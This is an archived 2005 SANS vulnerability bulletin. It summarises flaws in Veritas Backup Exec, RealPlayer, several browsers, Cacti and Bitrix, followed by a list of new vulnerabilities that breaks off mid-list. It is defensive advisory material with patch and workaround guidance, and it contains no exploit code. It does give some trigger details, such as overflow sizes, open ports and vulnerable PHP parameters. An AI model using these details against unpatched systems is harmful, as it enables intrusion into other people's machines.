NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > SANS> 2005

RISK: The Consensus Security Vulnerability Alert Vol. 4 No. 25

From: The SANS Institute (ConsensusSecurityVulnerabilityAlertsans.org)
Date: Fri Jun 24 2005 - 11:25:29 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Four critical problems in Veritas back up products merit your immediate
attention if you use that popular software suite (#1 below). And on
both your children's computers and your own, if you use music and video
software from Real (#2 below), click on "Tools" or "Help" and choose
"Check for Updates" to get fixes to flaws in that software that could
allow Trojans to be placed on your computers.

Also, you have two more weeks to get the early registration discount for
SANS largest Washington DC Security training program (July 28 - August 3):
http://www.sans.org/washington2005

Alan

*************************************************************************
RISK: The Consensus Security Vulnerability Alert
June 24, 2005 Vol. 4. Week 25
*************************************************************************

RISK is the SANS community's consensus bulletin summarizing the most
important vulnerabilities and exploits identified during the past week
and providing guidance on appropriate actions to protect your systems
(PART I). It also includes a comprehensive list of all new
vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:
========================================================================
Platform # of Updates & Vulnerabilities
========================================================================
Other Microsoft Products 1
Third Party Windows Apps 6
Mac Os 1
Linux 4
Solaris 1
Unix 4
Cross Platform 12 (#1, #2, #3)
Web Application 30 (#4)
Network Device 3

********************** Sponsored by BindView ****************************

Access control challenges?

Have auditors asked who has access to your critical resources, how they
got access and for the business owners to sign off? They will. Find out
why this information is critical yet difficult to produce. Equally
important, find out how you quickly and easily create it. Download the
white paper "User and Group Entitlement Reporting"

https://ocp.bindview.com/Surveys/Main/EventMF.cfm?NUM=1412&AD=NS-AtRisLtrUsGrEnRWP-Q205

*************************************************************************

Table of Contents:

Part I -- Critical Vulnerabilities from TippingPoint, a division of 3Com
(www.tippingpoint.com)

Widely Deployed Software
(1) CRITICAL: Veritas Backup Software Multiple Vulnerabilities
(2) HIGH: RealNetworks RealPlayer Multiple Vulnerabilities
(3) LOW: Multiple Browsers Dialogue Box Spoofing

Other Software
(4) HIGH: Cacti and Bitrix Remote File Include Vulnerabilities

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from
Qualys (www.qualys.com)

-- Other Microsoft Products
05.25.1 - Internet Explorer Dialog Box Origin Spoofing
-- Third Party Windows Apps
05.25.2 - Veritas Backup Exec/NetBackup Request Packet Denial Of Service
05.25.3 - Veritas Backup Exec Remote Agent Null Pointer Dereference Denial Of Service
05.25.4 - Veritas Backup Exec Remote Agent Servers Privilege Escalation
05.25.5 - Veritas Backup Exec Server Remote Registry Access
05.25.6 - Veritas Backup Exec Admin Plus Pack Remote Heap Overflow
05.25.7 - RealVNC Server Remote Information Disclosure
-- Mac Os
05.25.8 - Safari Dialog Box Origin Spoofing
-- Linux
05.25.9 - Asterisk Manager Interface Command Processing Remote Buffer Overflow
05.25.10 - Ruby XMLRPC Server Command Execution
05.25.11 - Vipul Razor-agents Multiple Unspecified Denial of Service Vulnerabilities
05.25.12 - SuSE Linux GPG2 S/MIME Signing Unspecified Vulnerability
-- Solaris
05.25.13 - Sun ONE/iPlanet Messaging Server Webmail HTML Injection
-- Unix
05.25.14 - NanoBlogger Arbitrary Command Execution
05.25.15 - Heimdal TelnetD Remote Buffer Overflow
05.25.16 - Yaws Source Code Disclosure
05.25.17 - SpamAssassin Malformed Email Header Remote Denial of Service
-- Cross Platform
05.25.18 - Slim Browser Dialog Box Origin Spoofing Vulnerability
05.25.19 - Veritas Backup Exec Remote Agent Authentication Buffer Overflow
05.25.20 - Veritas Backup Exec Web Administration Console Remote Buffer Overflow
05.25.21 - Avant Browser Dialog Box Origin Spoofing
05.25.22 - Tor Arbitrary Memory Information Disclosure
05.25.23 - Mozilla Firefox Dialog Box Origin Spoofing
05.25.24 - Opera Web Browser Dialog Box Origin Spoofing Vulnerability
05.25.25 - iCab Web Browser Dialog Box Origin Spoofing Vulnerability
05.25.26 - JBoss Malformed HTTP Request Remote Information Disclosure
05.25.27 - Bitrix Site Manager Remote File Include
05.25.28 - Opera XMLHttpRequest Object Cross-Domain Access
05.25.29 - Opera Cross-Site Scripting and Local File Disclosure
-- Web Application
05.25.30 - DUclassmate Multiple SQL Injection Vulnerabilities
05.25.31 - DUpaypal Pro SQL Injection
05.25.32 - DUamazon Pro Multiple SQL Injection Vulnerabilities
05.25.33 - RaXnet Cacti SQL Injection
05.25.34 - Moodle Unspecified Text Filtering Vulnerability
05.25.35 - RaXnet Cacti Config_Settings.PHP Remote File Include
05.25.36 - RaXnet Cacti Remote File Include
05.25.37 - MercuryBoard Index.PHP Remote SQL Injection
05.25.38 - Moodle Teacher Privilege Escalation
05.25.39 - i-Gallery Folder Argument Cross-Site Scripting
05.25.40 - Fortibus CMS SQL Injection
05.25.41 - cPanel User Parameter Cross-Site Scripting
05.25.42 - LaGarde StoreFront Shopping Cart LOGIN.ASP SQL Injection
05.25.43 - paFaq Database Unauthorized Access
05.25.44 - paFaq Question Cross-Site Scripting
05.25.45 - paFaq Administrator Username SQL Injection
05.25.46 - i-Gallery Directory Traversal
05.25.47 - Contelligent Preview Privilege Escalation
05.25.48 - Trac Unauthorized File Upload/Download Vulnerability
05.25.49 - Uapplication Ublog Reload Multiple SQL Injection Vulnerabilities
05.25.50 - Ublog Reload Trackback.ASP Cross-Site Scripting
05.25.51 - osCommerce Multiple HTTP Response Splitting Vulnerabilities
05.25.52 - XAMMP Lang.PHP HTML Injection
05.25.53 - XAMMP Lang.PHP Directory Traversal Vulnerability
05.25.54 - ATutor Multiple Cross-Site Scripting Vulnerabilities
05.25.55 - Cool Cafe Chat LOGIN.ASP SQL Injection
05.25.56 - e107 Website System Multiple Input Validation and Information Disclosure Vulnerabilities
05.25.57 - Ultimate PHP Board Weak Password Encryption
05.25.58 - Ultimate PHP Board Multiple Cross-Site Scripting Vulnerabilities
05.25.59 - SquirrelMail Multiple Unspecified Cross-Site Scripting Vulnerabilities
-- Network Device
05.25.60 - Enterasys Networks Vertical Horizon Default Backdoor Account Vulnerability
05.25.61 - Enterasys Networks Vertical Horizon Remote Denial of Service
05.25.62 - Cisco VPN Concentrator Groupname Enumeration Weakness

************************* Sponsored Links *******************************

1) Hacking Web Applications- FREE White Paper from SPI Dynamics
http://www.sans.org/info.php?id=808

2) The deadline is next week for the only opportunity to have SANS
instructors delivering live classes on-line at your workplace and at
home. You can still sign up for SANS exclusive training program for
CISSP, even though it started Wednesday. The others (Forensics,
Auditing, Hacker Techniques, Security Essentials, and more) start in the
next few weeks.
http://www.sans.org (see SANSHome)

*************************************************************************

PART I Critical Vulnerabilities

Part I is compiled by Rohit Dhamankar (rohitd_at_tippingpoint.com) at
TippingPoint, a division of 3Com, as a by-product of that company's
continuous effort to ensure that its intrusion prevention products
effectively block exploits using known vulnerabilities. TippingPoint's
analysis is complemented by input from a council of security managers
from twelve large organizations who confidentially share with SANS the
specific actions they have taken to protect their systems. A detailed
description of the process may be found at
http://www.sans.org/newsletters/cva/#process
Archives at http://www.sans.org/newsletters/risk

************************
Widely Deployed Software
************************

(1) CRITICAL: Veritas Backup Software Multiple Vulnerabilities
Affected:
Backup Exec 10.0 for Windows Servers rev. 5484
Backup Exec 9.1 for Windows Servers rev. 4691
Backup Exec 9.0 for Windows Servers rev. 4454 and 4367
Backup Exec 9.1.307/306/1154/1152.4/1152 /1151.1/1127.1/1067.3/1067.2 for NetWare Servers
Backup Exec 9.0.4202 /4174/4172/4170 /4019 for NetWare Servers

Description: Veritas Backup Exec is a backup and restore solution for
Windows and NetWare server environments. This software contains the
following vulnerabilities:

(a) The Backup Agent is installed on all the server systems that are
backed up. This agent, that listens on port 10000/tcp by default, uses
the Network Data Management Protocol (NDMP) for authentication purposes.
The implementation of the NDMP Windows client authentication method
contains a buffer overflow that can be triggered by an overlong
password. The overflow can be exploited to execute arbitrary code with
the privileges of the Backup Agent process, typically domain
administrator. The discoverers have posted complete technical details
for this flaw.

(b) The Backup Exec Web Administration Console (BEWAC) allows remote
administration of the media server (the server that is connected to the
storage devices and is running the Veritas Backup Engine) via HTTP. The
BEWAC runs on port 8099/tcp by default. The Windows installation of
BEWAC is reported to contain a buffer overflow that can be exploited to
execute arbitrary code. The discoverers plan to post the technical
details for this flaw in another 3 months.

(c) The Admin Plus Pack Option (introduced in version 9.0 for Windows
servers) and the Centralized Admin Server Option allow easy management
of multiple backup servers. Such configurations contain a heap-based
overflow in the Backup Exec server that can be exploited to execute
arbitrary code. The discoverers plan to post the technical details for
this flaw in another 3 months. They have also reported that the version
10.x is vulnerable even if the Admin Plus Pack Option has not been
installed.

(d) The Backup Exec on Windows runs a RPC service listening on port
6106/tcp that allows remote registry access. This service, however, does
not check for any user credentials. As a result any unauthenticated
attacker can bind to this service and change the registry settings with
"Administrator" privileges. This can lead to a complete compromise of
the system. The details of how to craft a malicious RPC request have
been publicly posted.

(e) The Backup Agent also contains denial-of-service vulnerabilities
that can be triggered by request packets containing "Error Status"
values other than 0 or other specially crafted requests.

Status: Veritas has released fixes which should be applied immediately.
A workaround is to block the ports associated with the Veritas agent and
server services such as 10000/tcp, 8099/tcp, 6106/tcp etc. at the
network perimeter. Note that another buffer overflow vulnerability
disclosed in the Backup agent in December 2004 was widely exploited.

Council Site Actions: Two of the council sites are already in the
process of patching their systems. One site plans to patch during their
next regularly scheduled system update process. Three other council
sites are still in the process of assessing the risk and developing a
remediation plan. They commented that they will most likely treat this
as a high risk. One site commented that they are scanning their network
on these ports 8099/tcp and 10000/tcp to gather more information about
the affected machine population.

References:
Veritas Advisories
http://seer.support.veritas.com/docs/276604.htm
http://seer.support.veritas.com/docs/276605.htm
http://seer.support.veritas.com/docs/276606.htm
http://seer.support.veritas.com/docs/276533.htm
http://seer.support.veritas.com/docs/276607.htm
http://seer.support.veritas.com/docs/277485.htm
iDefense Advisories
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0073.html
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0074.html
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0075.html
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0076.html
Postings by NGSSoftware
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0069.html
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0070.html
NDMP Protocol Details
http://www.ndmp.org/info/overview.shtml
Backup Exec Homepage and Administrator Guide
http://veritas.com/Products/www?c=product&refId=57
http://ftp.support.veritas.com/pub/support/products/Backup_Exec_for_WindowsNT/269777.pdf
SecurityFocus BIDs
http://www.securityfocus.com/bid/14020
http://www.securityfocus.com/bid/14021
http://www.securityfocus.com/bid/14022
http://www.securityfocus.com/bid/14023
http://www.securityfocus.com/bid/14025

****************************************************************

(2) HIGH: RealNetworks RealPlayer Multiple Vulnerabilities
Affected:
On Windows:
RealPlayer 10.5 (6.0.12.1040-1069)
RealPlayer 8/10
RealOne Player v2/v1
RealPlayer Enterprise
Rhapsody 3 (build 0.815-0.1006)
On Mac OS:
Mac RealPlayer 10 (10.0.0.305-331)
Mac RealOne Player
On Linux:
Linux RealPlayer 10 (10.0.0-4)
Helix Player (10.0.0-4)

Description: RealNetworks' various media players contain the following
vulnerabilities that can be exploited by a malicious webpage or an HTML
email to compromise a client system.

(a) A specially crafted AVI movie file triggers a heap-based overflow
that can be exploited to execute arbitrary code. The problem arises when
the "stream format chunk (strf)" size in an AVI file is greater than
1064 bytes.

(b) A specially crafted RealMedia file with RealText also triggers a
heap-based overflow that can be exploited to execute arbitrary code. The
problem arises when the size of the RealText data exceeds 256 bytes.

(c) A specially crafted MP3 file can overwrite a local file or lead to
execution of an ActiveX control on the client system. This can be
exploited to install malware on client systems. The technical details
required to leverage this flaw have not been posted yet.

Note that systems with RealPlayer configured as the default media player
are at a greater risk as the malicious media files may be opened without
any user prompting.

Status: RealNetworks has released updates for all the vulnerabilities.
Users should be advised to upgrade their player by clicking "Tools" or
"Help" menu and then choosing "Check For Updates".

References:
RealNetworks Advisory
http://service.real.com/help/faq/security/050623_player/EN/
eEye Advisory
http://www.eeye.com/html/research/advisories/AD20050623.html
iDefense Advisory
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0077.html
AVI File Format
http://msdn.microsoft.com/library/en-us/wcemultimedia5/html/wce50conAVIMainHeader.asp
RealText Reference
http://service.real.com/help/library/guides/realtext/htmfiles/intro.htm
SecurityFocus BIDs
http://www.securityfocus.om/bid/13530

***********************************************************************

(3) LOW: Multiple Browsers Dialogue Box Spoofing
Affected:
Internet Explorer, Mozilla, Opera, Safari, Firefox

Description: This vulnerability in multiple browsers may allow an
attacker to steal sensitive information from users and conduct phishing
attacks. The problem arises because a dialogue box opened by using
javascript code does not display the original website it belongs to. As
a result, an attacker can craft a webpage that opens a trusted webpage
and a dialogue box (posting content to the attacker's site), and ask the
user to enter his information in the dialogue box. Secunia has posted
proof of concept code.

Status: Users should be advised to enter information only in the forms
supplied by the original site and not any dialogue boxes.

Council Site Actions: All of the reporting council sites are waiting on
confirmation and patches from the vendors. They will most like deploy
the patch during one of their regularly scheduled system update
processes.

References:
Secunia Advisory
http://secunia.com/secunia_research/2005-9/advisory/
SecurityFocus BIDs
http://www.securityfocus.com/bid/14007
http://www.securityfocus.com/bid/14008
http://www.securityfocus.com/bid/14009
http://www.securityfocus.com/bid/14010
http://www.securityfocus.com/bid/14011
http://www.securityfocus.com/bid/14012

****************************************************************

************************
Other Software
************************

(4) HIGH: Cacti and Bitrix Remote File Include Vulnerabilities
Affected:
Cacti, a Linux graphics software, version 0.8.6d and prior
Bitrix Site Manager, a Content Management Software, version 4.0.5 and prior

Description: The following software packages reportedly contain PHP
remote file include vulnerabilities: Cacti and Bitrix Site Manager.
These flaws can be exploited by a remote attacker to run arbitrary PHP
code on the webserver hosting the vulnerable software packages. The
postings show how to craft the malicious HTTP requests to exploit the
flaws.

Status:
Cacti - Upgrade to version 0.8.6e
Bitix Site Manager - Upgrade to version 4.0.9

References:
Cacti
iDefense Advisories
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0066.html
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0067.html
Vendor Homepage
http://www.cacti.net
SecurityFocus BID
http://www.securityfocus.com/bid/14028
Bitrix Site Manager
Posting by D_Bug
http://archives.neohapsis.com/archives/bugtraq/2005-06/0119.html
Vendor Homepage
http://www.bitrixsoft.com/
SecurityFocus BID
http://www.securityfocus.com/bid/13965

**********************************************************************

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 25, 2005

This list is compiled by Qualys ( www.qualys.com ) as part of that
company's ongoing effort to ensure its vulnerability management web
service tests for all known vulnerabilities that can be scanned. As of
this week Qualys scans for 4389 unique vulnerabilities. For this
special SANS community listing, Qualys also includes vulnerabilities
that cannot be scanned remotely.

______________________________________________________________________

05.25.1 CVE: Not Available
Platform: Other Microsoft Products
Title: Internet Explorer Dialog Box Origin Spoofing
Description: Microsoft Internet Explorer is vulnerable to a dialog box
origin spoofing issue. A remote attacker may be able to display a
spoofed dialog box to a user that seemingly originates from a trusted
site to carry out phishing style attacks.
All currently supported versions of Internet Explorer are vulnerable.
Ref: http://www.microsoft.com/technet/security/advisory/902333.mspx
______________________________________________________________________

05.25.2 CVE: CAN-2005-0772
Platform: Third Party Windows Apps
Title: Veritas Backup Exec/NetBackup Request Packet Denial Of Service
Description: Veritas Backup Exec and NetBackup for NetWare Media
Servers are vulnerable to a denial of service issue due to improper
handling of a malformed request packet. A remote attacker could
leverage this issue to cause a denial of service on a vulnerable
machine. Please refer to the link for a list of vulnerable versions.
Ref: http://seer.support.veritas.com/docs/276533.htm
______________________________________________________________________

05.25.3 CVE: CAN-2005-0772
Platform: Third Party Windows Apps
Title: Veritas Backup Exec Remote Agent Null Pointer Dereference
Denial Of Service
Description: Veritas Backup Exec Remote Agent is prone to a remotely
exploitable denial of service vulnerability. This could cause a denial
of service on the computer hosting the application. In particular, a
malformed request may cause a null pointer dereference in the
application. This could impact availability of the service and the
computer hosting the application.
Ref: http://seer.support.veritas.com/docs/276533.htm
______________________________________________________________________

05.25.4 CVE: Not Available
Platform: Third Party Windows Apps
Title: Veritas Backup Exec Remote Agent Servers Privilege Escalation
Description: Veritas Backup Exec is a network enabled backup solution
from Veritas. It is affected by a privilege escalation vulnerability.
This issue can allow remote users to gain elevated privileges and
completely compromise an affected computer. Veritas Software Backup
Exec version 10.0 rev.5520 has been released to fix the issue.
Ref: http://www.securityfocus.com/bid/14026
______________________________________________________________________

05.25.5 CVE: CAN-2005-0771
Platform: Third Party Windows Apps
Title: Veritas Backup Exec Server Remote Registry Access
Description: Veritas Backup Exec is a network enabled backup solution
from Veritas. The Windows version is prone to an access validation
vulnerability which may be leveraged by a remote attacker to gain
"Administrator" access to the vulnerable computer's registry. Veritas
Software Backup Exec version 10.0 rev.5520 has been released to fix
the issue.
Ref: http://www.securityfocus.com/bid/14020
______________________________________________________________________

05.25.6 CVE: Not Available
Platform: Third Party Windows Apps
Title: Veritas Backup Exec Admin Plus Pack Remote Heap Overflow
Description: Veritas Backup Exec is a network enabled backup solution
from Veritas. Veritas Backup Exec is affected by a remote heap
overflow vulnerability. This issue affects Backup Exec running on
Microsoft Windows platforms. Veritas Backup Exec versions 10.0 rev.
5484 SP1 and earlier are known to be vulnerable.
Ref: http://seer.support.veritas.com/docs/276607.htm
______________________________________________________________________

05.25.7 CVE: Not Available
Platform: Third Party Windows Apps
Title: RealVNC Server Remote Information Disclosure
Description: RealVNC (Virtual Network Computing) allows users to
access remote computers for administration purposes. RealVNC is
affected by a remote information disclosure vulnerability. Reports
indicate that scanning TCP port 5900 using the DFind tool reveals
sensitive information such as RealVNC version and the underlying
operating system. This information may aid in other attacks against an
affected computer.
Ref: http://www.realvnc.com/pipermail/vnc-list/2005-June/051336.html
______________________________________________________________________

05.25.8 CVE: Not Available
Platform: Mac Os
Title: Safari Dialog Box Origin Spoofing
Description: Apple Safari is a web browser and it is vulnerable to a
dialog box origin spoofing issue when dialog boxes from inactive
windows may appear in other active windows. Apple Safari versions 1.3
and earlier are vulnerable.
Ref: http://secunia.com/secunia_research/2005-12/advisory/
______________________________________________________________________

05.25.9 CVE: Not Available
Platform: Linux
Title: Asterisk Manager Interface Command Processing Remote Buffer
Overflow
Description: Asterisk is a software-based PBX system. It is reported
to be vulnerable to a remote buffer overflow issue due to improper
boundary checks performed by command line interface processing
routines. Asterisk version 1.0.7 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14031
______________________________________________________________________

05.25.10 CVE: CAN-2005-1992
Platform: Linux
Title: Ruby XMLRPC Server Command Execution
Description: Ruby is an object-oriented scripting language. It is
vulnerable to an unspecified command execution issue. The XMLRPC
server in utils.rb for the ruby library (libruby) sets an invalid
default value that prevents "security protection". Ruby version 1.8.2
is vulnerable.
Ref: http://www.securityfocus.com/advisories/8719
http://www.security
focus.com/advisories/8718
______________________________________________________________________

05.25.11 CVE: CAN-2005-1266
Platform: Linux
Title: Vipul Razor-agents Multiple Unspecified Denial of Service
Vulnerabilities
Description: Vipul Razor is a distributed spam detection and filtering
network. Vipul Razor-agents is affected by multiple unspecified denial
of service vulnerabilities. Vipul Razor versions 2.72 and earlier are
known to be vulnerable.
Ref: http://www.securityfocus.com/advisories/8715
______________________________________________________________________

05.25.12 CVE: CAN-2005-2023
Platform: Linux
Title: SuSE Linux GPG2 S/MIME Signing Unspecified Vulnerability
Description: SuSE Linux is affected by an unspecified vulnerability
related to S/MIME signing using gpg2. The cause and impact of this
issue is currently unknown but it's likely that this is a remote
vulnerability. SuSE Linux version 9.3 is vulnerable.
Ref: http://www.securityfocus.com/advisories/8709
______________________________________________________________________

05.25.13 CVE: CAN-2005-2022
Platform: Solaris
Title: Sun ONE/iPlanet Messaging Server Webmail HTML Injection
Description: Sun ONE/iPlanet Messaging Server Webmail with users who
access webmail with Internet Explorer is vulnerable to an HTML
injection vulnerability due to insufficent sanitization of HTML and
the script code. Sun ONE Messaging Server version 6.2 and Sun iPlanet
Messaging Server 5.2 are vulnerable.
Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101770-1

______________________________________________________________________

05.25.14 CVE: CAN-2005-2039
Platform: Unix
Title: NanoBlogger Arbitrary Command Execution
Description: NanoBlogger is a small weblog engine written in Bash for
the command line. NanoBlogger is affected by a vulnerability regarding
the execution of arbitrary commands. This issue is due to an input or
access validation failure within the "recent_entries" and
"master_archive" plugins. This reportedly leads to the execution of
arbitrary commands. The vendor has addressed this issue in NanoBlogger
version 3.2.2 and later; earlier versions are reported vulnerable.
Ref: http://www.securityfocus.com/bid/14006
______________________________________________________________________

05.25.15 CVE: CAN-2005-2040
Platform: Unix
Title: Heimdal TelnetD Remote Buffer Overflow
Description: Heimdal is a free implementation of the Kerberos 5
network authentication protocol. Heimdal telnetd is susceptible to a
remote buffer overflow vulnerability. This issue is due to a failure
of the application to properly bounds check user-supplied data prior
to copying it to an insufficiently sized memory buffer. This
vulnerability may be exploited by remote attackers to influence the
proper flow of execution of the application, resulting in
attacker-supplied machine code being executed in the context of the
affected network service.
Ref: http://www.pdc.kth.se/heimdal/advisory/2005-06-20/
______________________________________________________________________

05.25.16 CVE: Not Available
Platform: Unix
Title: Yaws Source Code Disclosure
Description: Yaws is an HTTP server. It is vulnerable to a disclosure
of source code issue due to insufficient sanitization of HTTP
requests. Yaws versions 1.55 and earlier are vulnerable.
Ref: http://www.sec-consult.com/181.html
______________________________________________________________________

05.25.17 CVE: CAN-2005-1266
Platform: Unix
Title: SpamAssassin Malformed Email Header Remote Denial of Service
Description: SpamAssassin is a mail filter designed to identify and
process spam. It is prone to a remote denial of service issue due to a
failure in the application to properly handle overly long email
headers. SpamAssassin versions 3.0.3 and earlier are affected.
Ref: http://www.securityfocus.com/bid/13978
______________________________________________________________________

05.25.18 CVE: Not Available
Platform: Cross Platform
Title: Slim Browser Dialog Box Origin Spoofing Vulnerability
Description: Slim Browser is reported to be vulnerable to a dialog box
origin spoofing issue. The issue presents itself when dialog boxes
from inactive windows appear in other active windows.
Ref: http://www.securityfocus.com/bid/14038
______________________________________________________________________

05.25.19 CVE: CAN-2005-0773
Platform: Cross Platform
Title: Veritas Backup Exec Remote Agent Authentication Buffer Overflow
Description: Veritas Backup Exec Remote Agent is affected by a
remotely exploitable buffer overflow issue when handling
authentication requests. This issue is due to a boundary condition
error that is exposed during authentication requests to the
application. Backup Exec for NetWare Servers version 9.1.1156 and
Backup Exec version 10.0 rev.5520 have been released to fix this
issue.
Ref: http://www.securityfocus.com/bid/14022
______________________________________________________________________

05.25.20 CVE: Not Available
Platform: Cross Platform
Title: Veritas Backup Exec Web Administration Console Remote Buffer
Overflow
Description: Veritas Backup Exec is a network enabled backup solution
from Veritas. It is reported to be vulnerable to a remote buffer
overflow issue due to improper boundary checks.
Ref: http://www.securityfocus.com/bid/14025
______________________________________________________________________

05.25.21 CVE: Not Available
Platform: Cross Platform
Title: Avant Browser Dialog Box Origin Spoofing
Description: Avant Browser is affected by a dialog box origin spoofing
vulnerability. Avant Browser versions 10.0 Build 029 and earlier are
known to be vulnerable.
Ref: http://www.securityfocus.com/bid/14012
______________________________________________________________________

05.25.22 CVE: Not Available
Platform: Cross Platform
Title: Tor Arbitrary Memory Information Disclosure
Description: Tor is an implementation of second generation Onion
Routing, a connection-oriented anonymizing communication service. Tor
is affected by an arbitrary memory information disclosure
vulnerability. Tor versions 0.0.9.9 and earlier are known to be
vulnerable.
Ref: http://archives.seul.org/or/announce/Jun-2005/msg00001.html
______________________________________________________________________

05.25.23 CVE: Not Available
Platform: Cross Platform
Title: Mozilla Firefox Dialog Box Origin Spoofing
Description: Mozilla Firefox browsers are prone to a dialog box origin
spoofing issue which can allow remote attackers to carry out phishing
style attacks. Mozilla Firefox versions 1.0.4 and earlier are
affected.
Ref: http://www.securityfocus.com/bid/14008
______________________________________________________________________

05.25.24 CVE: Not Available
Platform: Cross Platform
Title: Opera Web Browser Dialog Box Origin Spoofing Vulnerability
Description: Opera Web Browser is vulnerable to a dialog box origin
spoofing issue that may allow a malicious user to spoof an interface
of a trusted web site and carry out phishing style attacks. All
current versions of Opera Web Browser are vulnerable.
Ref: http://www.securityfocus.com/bid/14009/info
______________________________________________________________________

05.25.25 CVE: Not Available
Platform: Cross Platform
Title: iCab Web Browser Dialog Box Origin Spoofing Vulnerability
Description: iCab web browser is reported to be vulnerable to a dialog
box origin spoofing issue. The issue presents itself when dialog boxes
from inactive windows appear in other active windows. iCab version
2.9.8 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14010
______________________________________________________________________

05.25.26 CVE: CAN-2005-2006
Platform: Cross Platform
Title: JBoss Malformed HTTP Request Remote Information Disclosure
Description: JBoss is a Java Application server. Insufficient
sanitization of the "%" character in the HTTP parsing of the
"org.jboss.web.WebServer" class exposes the issue. JBoss versions
4.0.2 and earlier are affected.
Ref: http://www.securityfocus.com/bid/13985
______________________________________________________________________

05.25.27 CVE: Not Available
Platform: Cross Platform
Title: Bitrix Site Manager Remote File Include
Description: Bitrix Site Manager is a web-based content management
system. It is vulnerable to a remote file include issue due to
insufficent sanitization of user-supplied input when passing data
through the "_SERVER[DOCUMENT_ROOT]" parameter of the "start.php"
script. Bitrix Site Manager versions 4.0.5 and earlier are vulnerable.
Ref: http://www.securityfocus.com/bid/13965
______________________________________________________________________

05.25.28 CVE: CAN-2005-1475
Platform: Cross Platform
Title: Opera XMLHttpRequest Object Cross-Domain Access
Description: Opera Web Browser is prone to an issue that allows a
violation of the cross-domain security model. This issue arises due to
an access validation error affecting the "XMLHttpRequest" object. The
cross-domain security model restrictions can be bypassed due to
insufficient checks performed on server side redirects. Opera Web
Browser version 8.0 is affecetd.
Ref: http://www.securityfocus.com/bid/13970
______________________________________________________________________

05.25.29 CVE: CAN-2005-1669
Platform: Cross Platform
Title: Opera Cross-Site Scripting and Local File Disclosure
Description: Opera is affected by cross-site scripting and local file
disclosure issues. These issues are exposed when malformed
"javascript:" URIs are opened in a new window or frame. Opera version
8.0 is affected.
Ref: http://www.securityfocus.com/bid/13969/info
______________________________________________________________________

05.25.30 CVE: Not Available
Platform: Web Application
Title: DUclassmate Multiple SQL Injection Vulnerabilities
Description: DUclassmate is a classmates listing and friends search
web application. Insufficient sanitization of the "iPro" parameter of
the "edit.asp" script and "iState" paramter of the "default.asp"
script exposes the application to an SQL injection issue. DUclassmate
version 1.2 is affected.
Ref: http://www.securityfocus.com/bid/14036
______________________________________________________________________

05.25.31 CVE: Not Available
Platform: Web Application
Title: DUpaypal Pro SQL Injection
Description: DUpaypal Pro is a professional Paypal-based E-Commerce
storefront. DUpaypal Pro is prone to multiple SQL injection
vulnerabilities. These issues are due to a failure in the application
to properly sanitize user-supplied input before using it in SQL
queries. These vulnerabilities could permit remote attackers to pass
malicious input to database queries, resulting in modification of
query logic or other attacks.
Ref: http://www.securityfocus.com/bid/14034
______________________________________________________________________

05.25.32 CVE: Not Available
Platform: Web Application
Title: DUamazon Pro Multiple SQL Injection Vulnerabilities
Description: DUamazon Pro is a web storefront for affiliates of
Amazon. DUamazon Pro is affected by multiple SQL injection
vulnerabilities. DUamazon Pro versions 3.1 and earlier are known to be
vulnerable.
Ref: http://www.securityfocus.com/bid/14033
______________________________________________________________________

05.25.33 CVE: CAN-2005-1525
Platform: Web Application
Title: RaXnet Cacti SQL Injection
Description: RaXnet Cacti is a complete front-end to the RRDTool.
Cacti is prone to multiple SQL injection vulnerabilities. These issues
are due to a failure in the application to properly sanitize
user-supplied input before using it in SQL queries. These issues could
permit remote attackers to pass malicious input to database queries,
resulting in modification of query logic and other attacks. Cacti
versions prior to 0.8.6e are affected by these vulnerabilities.
Ref: http://www.idefense.com/application/poi/display?id=267&type=vulnerabilities
______________________________________________________________________

05.25.34 CVE: Not Available
Platform: Web Application
Title: Moodle Unspecified Text Filtering Vulnerability
Description: Moodle is a PHP web application that provides training. A
malicious user with remote web access may craft an arbitrary text
sequence to trigger this vulnerability. This text sequence is said to
allow unauthorized access to the application. Moodle version 1.1.1 is
reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14018
______________________________________________________________________

05.25.35 CVE: CAN-2005-1526
Platform: Web Application
Title: RaXnet Cacti Config_Settings.PHP Remote File Include
Description: RaXnet Cacti is a front-end to the RRDTool. It is
affected by a remote file include issue due to a failure of the
application to properly sanitize "config[include_path]" parameter of
the "config_settings.php" script. Raxnet Cacti versions 0.8.6d and
earlier are affected.
Ref: http://www.securityfocus.com/bid/14028
______________________________________________________________________

05.25.36 CVE: CAN-2005-1524
Platform: Web Application
Title: RaXnet Cacti Remote File Include
Description: RaXnet Cacti is a front-end to the RRDTool. It is
vulnerable to a remote file include issue due to a failure of the
application to properly sanitize user-supplied input prior to using it
in a PHP "include()" function call in the "top_graph_header.php"
script. An attacker may leverage this issue to execute arbitrary
server-side script code on an affected computer with the privileges of
the Web server process. RaXnet Cacti versions earlier than 0.8.6 e are
vulnerable.
Ref: http://www.cacti.net/release_notes_0_8_6e.php
______________________________________________________________________

05.25.37 CVE: CAN-2005-2028
Platform: Web Application
Title: MercuryBoard Index.PHP Remote SQL Injection
Description: MercuryBoard is a web-based message board application.
Insufficient sanitization of the "index.php" script exposes an SQL
injection issue in the application. MercuryBoard version 1.1.4 is
affected.
Ref: http://www.securityfocus.com/bid/14015
______________________________________________________________________

05.25.38 CVE: Not Available
Platform: Web Application
Title: Moodle Teacher Privilege Escalation
Description: Moodle provides online web-based training. It is reported
to be vulnerable to a privilege escalation issue. The issue presents
itself when an authenticated "teacher" account is able to obtain
administrative access to the web application. Moodle versions 1.1.1.
and earlier are reported to be vulnerable.
